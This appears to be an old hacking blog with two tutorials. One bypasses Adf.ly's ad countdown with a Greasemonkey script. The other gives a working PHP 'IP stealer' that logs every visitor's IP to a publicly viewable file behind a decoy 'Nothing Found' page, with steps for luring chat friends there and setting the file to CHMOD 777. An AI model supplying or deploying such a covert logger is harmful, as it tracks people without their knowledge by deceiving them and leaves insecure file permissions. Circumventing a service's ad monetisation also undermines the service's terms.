Doing the thing I give you below will help you to bypass the Adf.ly advertisement. By using this Adf.ly hack, you don't need to wait for the counter to go to zero.

To bypass/hack Adf.ly, you need to have Firefox browser with Greasemonkey installed. You can install Greasemonkey firefox addon, if you haven't installed yet.

1. Go to Adf.ly Hacker script page to bypass/hack Adf.ly advertisements.

2. Hit on Install and confirm the script installation in your Greasemonkey.




3. Now, whenever you'll click on any Adf.ly shortened link, you won't see any timer or counter of 5 seconds. The actual  page will appear.

Hope You Guyz like it

HAPPY HACKING




Feb 3, 2011

IP Catcher-Steal Ip's




Many people are very curious to know the IP of the friend they are chatting with on Google Talk, though they don't know how to use it in a good or a bad way. In this article I will teach you how to steal an IP using a PHP script.

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

How to steal an IP address??
Register for free hosting at byethost and follow the steps.

<html><body>
<?php
$file = "ips.txt";
$f = fopen($file, 'a');                        // open the log file in append mode
fwrite($f, $_SERVER['REMOTE_ADDR'] . "\n");    // write the visitor's IP address, one per line
fclose($f);
?>
<p>Nothing Found!!saurav!!</p>
</body>
</html>
 Save it as steal.php

1.) First of all you need to make a new .txt document on the website you're uploading this to. Name it ips.txt (you can change that in the script as well, where it says $file = 'ips.txt'; in the second line, which I have done already). Then change the CHMOD to 777.

2.) Now you need to paste the script above into a steal.php document, and upload it.

3.) Now you make people visit your site, and they will see only "Nothing Found!!saurav!!"!

4.) To view the IP, you simply add "/ips.txt" after your domain, and you'll see the IP.


This is a very simple but effective method for stealing someone's IP address.
Happy Hacking.







 


